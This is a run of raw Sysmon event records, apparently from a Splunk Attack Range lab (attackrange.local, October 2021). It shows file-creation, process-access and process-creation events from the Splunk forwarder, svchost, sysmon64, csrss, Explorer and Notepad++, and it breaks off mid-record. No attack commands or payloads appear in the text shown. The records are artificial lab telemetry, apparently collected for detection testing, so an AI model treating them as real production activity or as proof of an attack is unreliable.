Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A755023429F3457D7BFD3D7C66E1C78,SHA256=4D48A7FE7ABBBFF44D0FF08C77D0B6A27F51B5F0F5413993A3DBF881B02E7AD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104235Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:35.282{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76A251E627832E58D4E835EE90C57ECA,SHA256=409D32949134708078468B7A51AE7CBECB873F0B412BE8AD105ED2B29D07DB37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082120Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.827{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C06277D7D8CF08B5E85ABA9971035CAA,SHA256=19753B33896A753898A830D822C38BFD1A64CC6DE78AD7B2195DC6BC064B598E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082119Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.780{2FDD8D40-B33B-615A-6201-00000000FD01}19603864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082118Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.592{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B33B-615A-6201-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082117Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.592{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082116Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.592{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082115Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.592{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082114Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.592{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082113Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.592{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082112Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.592{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082111Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.592{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082110Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.592{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082109Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.592{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082108Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.592{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B33B-615A-6201-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082107Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.592{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B33B-615A-6201-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082106Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.593{2FDD8D40-B33B-615A-6201-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082105Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:35.420{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C012B3848D1905612ADB94C7F7A894EF,SHA256=010AB53E7AC9AEF37F44FF8A50701B29AC2A5C99734D31E2807D67E36C36BE86,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104234Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:35.001{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104233Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:35.001{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104232Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:35.001{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104236Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:36.309{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD2F5E7F5BA5CF2C175B5C5B68B5A18B,SHA256=920868B8146B7D87D0D6225D8D8899A43932417C68AA1B653E30CFBDB22ADADF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082135Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.700{2FDD8D40-B33C-615A-6301-00000000FD01}36403492C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082134Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.497{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B33C-615A-6301-00000000FD01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082133Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.497{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082132Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.497{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082131Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.497{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082130Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.497{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082129Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:36.497{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082128Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 